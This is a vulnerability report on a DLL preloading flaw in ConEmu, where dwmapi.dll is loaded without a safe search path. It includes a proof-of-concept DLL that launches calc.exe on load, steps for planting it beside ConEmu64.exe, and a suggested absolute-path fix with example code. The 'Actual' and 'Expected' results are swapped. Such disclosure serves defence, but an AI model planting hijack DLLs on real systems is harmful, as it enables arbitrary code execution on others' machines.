ConEmu build: v23.07.24 x64 (Portable Version : ConEmuPack.230724.7z )
OS version: Windows 11 Pro x64 (Build 22621)
Used shell version (Far Manager, git-bash, cmd, powershell, cygwin, whatever): Explorer.exe
Steps to reproduce
Generate a malicious DLL file:
```cpp
#include "pch.h"
#include "framework.h"
#include <Windows.h>

BOOL APIENTRY DllMain(HMODULE hModule,
                      DWORD ul_reason_for_call,
                      LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        // Runs as soon as the host process loads this DLL.
        WinExec((LPSTR)"cmd.exe /c calc.exe", SW_SHOW);
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
```
This code invokes calc.exe.
Put it in the directory where ConEmuPack is installed, as dwmapi.dll.
Just click ConEmu64.exe.
Problem description
When ConEmu64.exe is executed, the CDwmHelper::InitDwm() method is invoked ( https://github.com/Maximus5/ConEmu/blob/master/src/ConEmu/DwmHelper.cpp ), and in this method, when loading dwmapi.dll, the LoadLibrary function has no flag to prevent DLL preloading.
ConEmu/src/ConEmu/DwmHelper.cpp
Line 111 in 740b09c
```cpp
mh_DwmApi = LoadLibrary(_T("dwmapi.dll"));
```
So, an attacker can move a malicious DLL file (filename is dwmapi.dll) into the directory where ConEmuPack is installed, and can achieve arbitrary code execution.
Actual results
ConEmu.exe and ConEmu64.exe must not be affected by DLL preloading.
Expected results
ConEmu.exe and ConEmu64.exe are affected by DLL preloading.
Additional files
PoC :
How to Solve
https://support.microsoft.com/en-au/topic/secure-loading-of-libraries-to-prevent-dll-preloading-attacks-d41303ec-0748-9211-f317-2edc819682e1
We can use an absolute path, and can use the GetSystemDirectory() function to combine the system directory path with the DLL file name (in this case, dwmapi.dll) to defend against it.
Sorry for my bad English 😢
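The mitigation suggested in the issue (an absolute path built from GetSystemDirectory()), as an added example that is not part of the original report and is not ConEmu's own code. BuildSystemDllPath and LoadSystemDll are hypothetical helper names; the Windows-only loader is guarded by `_WIN32`.

```cpp
// Added example: helper names are hypothetical, not from the ConEmu code base.
#include <string>
#ifdef _WIN32
#include <windows.h>
#endif

// Join the system directory and a bare DLL file name into an absolute path.
// Returns an empty string if the name could redirect the load elsewhere.
std::wstring BuildSystemDllPath(const std::wstring& systemDir,
                                const std::wstring& dllName)
{
    if (systemDir.empty() || dllName.empty())
        return L"";
    // The name must be a bare file name: no separators, no drive or stream colon.
    if (dllName.find_first_of(L"\\/:") != std::wstring::npos)
        return L"";
    std::wstring path = systemDir;
    if (path.back() != L'\\')
        path += L'\\';
    return path + dllName;
}

#ifdef _WIN32
// Load a system DLL by absolute path, so the application directory and the
// current directory are never searched for it.
HMODULE LoadSystemDll(const wchar_t* dllName)
{
    if (!dllName)
        return NULL;
    wchar_t sysDir[MAX_PATH];
    UINT len = GetSystemDirectoryW(sysDir, MAX_PATH);
    if (len == 0 || len >= MAX_PATH)  // call failed or buffer too small
        return NULL;
    std::wstring path = BuildSystemDllPath(std::wstring(sysDir, len), dllName);
    if (path.empty())
        return NULL;
    // LOAD_WITH_ALTERED_SEARCH_PATH: the DLL's own dependencies are resolved
    // starting from its directory (System32), not from the EXE's directory.
    return LoadLibraryExW(path.c_str(), NULL, LOAD_WITH_ALTERED_SEARCH_PATH);
}
#endif
```

At the call site quoted in the issue, the `LoadLibrary(_T("dwmapi.dll"))` call would become `LoadSystemDll(L"dwmapi.dll")`.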